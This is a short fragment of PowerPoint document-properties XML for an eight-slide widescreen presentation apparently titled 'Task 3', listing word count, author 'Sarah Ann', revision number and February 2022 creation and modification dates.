        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8833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98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216</TotalTime>
  <Words>368</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>32</Paragraphs>
  <Slides>8</Slides>
  <Notes>0</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>1</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Task 3</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dc:title>
  <dc:creator>Sarah Ann</dc:creator>
  <cp:lastModifiedBy>Sarah Ann</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-02-23T11:43:29Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-23T15:39:37Z</dcterms:modified>
</cp:coreProperties>
</file>